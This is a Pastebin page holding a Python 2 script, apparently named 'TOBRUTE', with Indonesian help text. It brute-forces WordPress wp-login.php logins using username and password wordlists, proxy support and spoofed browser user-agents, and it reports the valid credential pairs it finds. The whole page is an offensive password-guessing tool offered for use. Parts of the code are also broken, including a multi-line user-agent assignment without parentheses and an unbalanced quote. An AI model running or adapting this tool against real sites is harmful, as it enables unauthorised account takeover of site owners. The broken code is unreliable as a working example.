Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # -*- coding: utf-8 -*-
- import sys
- import urllib2, urllib
- import cookielib
- import re
- #
- #functions
- #
- def loadLst(fileName, lstName):
- f = open(fileName, 'r')
- for line in f:
- lstName.append(line.replace('\r\n',''))
- f.close()
- if len(sys.argv) <= 1:
- print 'TOBRUTE untuk brute wordpress by 4RS!M3R''
- print 'Email:ilzamarsimer@yahoo.com'
- print ''
- print ''
- print 'Menu:'
- print '-h URL'
- print '-U file contain list user'
- print '-P file contain list password'
- print '-u username'
- print '-p password'
- print '-v verbose mode / show login + pass kombinasi untuk setiap percobaan '
- print '-f lanjutkan setelah ditemukan login / password pair'
- print '-g user-agent'
- print '-x use proxy '
- print ''
- print 'Contoh: xxx.py -h http://xxx.com/wp-login.php/halaman login -u admin -P password.txt'
- sys.exit()
- print 'TOBRUTE untuk brute wordpress by 4RS!M3R'
- #
- #define variables
- #
- print ""
- url = ''
- wordlist = ''
- username = ''
- password = ''
- passFile = ''
- userFile = ''
- signal = 'type="password"'
- count = 0
- countAcc = 0
- mode = 1
- verbose = 0
- useProxy = 0
- continues = 0
- agent = "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0",
- "Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
- "Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
- "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
- "Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
- "Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
- "Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0",
- "Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0",
- "Mozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0",
- "Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
- "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
- "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
- "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
- "Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
- "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
- "Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
- "Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
- "Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
- "Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0",
- "Mozilla/5.0 (U; Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
- "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2",
- "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110612 Firefox/6.0a2",
- "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.861.0 Safari/535.2",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.861.0 Safari/535.2",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.861.0 Safari/535.2",
- "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1",
- "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.803.0 Chrome/14.0.803.0 Safari/535.1",
- "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1",
- "Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
- "Mozilla/5.0 ArchLinux (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
- "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/13.0.782.41 Chrome/13.0.782.41 Safari/535.1",
- "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
- "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
- "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
- "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
- "Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
- "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_3) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
- "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))",
- "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; yie8)",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET CLR 1.1.4322; .NET4.0C; Tablet PC 2.0)",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/13.0.782.215)",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) chromeframe/10.0.648.205",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)",
- "Mozilla/5.0 ( ; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
- "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",
- "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
- "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)",
- "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)",
- "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)",
- "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
- "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 3.0.04506.30)"
- result = ""
- #
- #check argvs
- #
- for arg in sys.argv:
- if arg == '-h':
- url = sys.argv[count + 1]
- elif arg == '-u':
- username = sys.argv[count + 1]
- elif arg == '-U':
- userFile = sys.argv[count + 1]
- elif arg == '-p':
- password = sys.argv[count + 1]
- elif arg == '-P':
- passFile = sys.argv[count + 1]
- elif arg == '-v':
- verbose = 1
- elif arg == '-s':
- signal = sys.argv[count + 1]
- elif arg == '-g':
- agent = sys.argv[count + 1]
- elif arg == '-x':
- lstTmp = sys.argv[count+1].split(':')
- proxyHandler = urllib2.ProxyHandler({lstTmp[0] : lstTmp[1]+':'+lstTmp[2]})
- useProxy = 1
- elif arg == '-f':
- continues = 1
- count += 1
- if (len(username)>0 and len(password)>0):
- mode = 1 #single
- elif (len(username)>0 and len(passFile)>0):
- mode = 2 #
- elif (len(userFile)>0 and len(password)>0):
- mode = 3
- elif (len(userFile)>0 and len(passFile)>0):
- mode = 4
- #
- #init opener
- #
- cookieJar = cookielib.CookieJar()
- cookieHandler = urllib2.HTTPCookieProcessor(cookieJar)
- if useProxy == 0:
- opener = urllib2.build_opener(cookieHandler)
- else:
- opener = urllib2.build_opener(proxyHandler,cookieHandler)
- opener.addheaders = [('User-agent', agent)]
- cookieJar.clear()
- cookieJar.clear_session_cookies()
- #
- #main
- #
- try:
- response = opener.open(url)
- content = response.read()
- if mode == 1:
- values = {'log' : username,
- 'pwd' : password,
- 'wp-submit' : 'Log In',
- 'redirect_to' : '',
- 'testcookie' : '1' }
- data = urllib.urlencode(values)
- print data
- response = opener.open(url+'/', data)
- strTmp = response.read()
- if strTmp.find(signal) < 0:
- countAcc += 1
- result += "username: " + username + " password: " + password + "\n"
- print "Valid user--pass: " + username + " -- " + password
- f3 = open('test.html','w')
- f3.write(strTmp)
- f3.close()
- if mode == 2:
- f = open(passFile,'r')
- for line in f:
- password = line.strip('\n\r')
- values = {'log' : username,
- 'pwd' : password,
- 'wp-submit' : 'Log In',
- 'redirect_to' : '',
- 'testcookie' : '1' }
- if verbose == 1:
- print "Trying u--p : " + username + " -- " + password
- data = urllib.urlencode(values)
- try:
- response = opener.open(url+'/', data)
- except urllib2.URLError, e:
- continue
- strTmp = response.read()
- if strTmp.find(signal) < 0:
- countAcc += 1
- result += "username: " + username + " password: " + password + "\n"
- print "Valid user--pass: " + username + " -- " + password
- break;
- if mode == 3:
- f = open(userFile,'r')
- for line in f:
- username = line.strip('\n\r')
- values = {'log' : username,
- 'pwd' : password,
- 'wp-submit' : 'Log In',
- 'redirect_to' : '',
- 'testcookie' : '1' }
- if verbose == 1:
- print "Trying u--p : " + username + " -- " + password
- data = urllib.urlencode(values)
- try:
- response = opener.open(url+'/', data)
- except urllib2.URLError, e:
- continue
- strTmp = response.read()
- if strTmp.find(signal) < 0:
- countAcc += 1
- result += "username: " + username + " password: " + password + "\n"
- print "Valid user--pass: " + username + " -- " + password
- if continues == 0:
- break
- cookieJar.clear()
- cookieJar.clear_session_cookies()
- response = opener.open(url)
- content = response.read()
- if mode == 4:
- f = open(userFile,'r')
- f2 = open(passFile,'r')
- for line in f:
- username = line.strip('\n\r')
- f2.seek(0)
- for line2 in f2:
- password = line2.strip('\n\r')
- values = {'log' : username,
- 'pwd' : password,
- 'wp-submit' : 'Log In',
- 'redirect_to' : '',
- 'testcookie' : '1' }
- if verbose == 1:
- print "Trying u--p : " + username + " -- " + password
- data = urllib.urlencode(values)
- try:
- response = opener.open(url+'/', data)
- except urllib2.URLError, e:
- continue
- strTmp = response.read()
- if strTmp.find(signal) < 0:
- countAcc += 1
- result += "username: " + username + " password: " + password + "\n"
- print "Valid user--pass: " + username + " -- " + password
- if continues == 0:
- break;
- cookieJar.clear()
- cookieJar.clear_session_cookies()
- response = opener.open(url)
- content = response.read()
- f.close()
- f2.close()
- #Finish
- print ''
- print '1 target successfuly completed, '+ str(countAcc) +' valid username+password found'
- print 'TARGER: ' + url
- print 'RESULT:'
- print result
- sys.exit()
- except urllib2.URLError, e:
- print "\n\t[!] Session Cancelled; Error occured. Check internet settings"
- except (KeyboardInterrupt):
- print "\n\t[!] Session cancelled"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement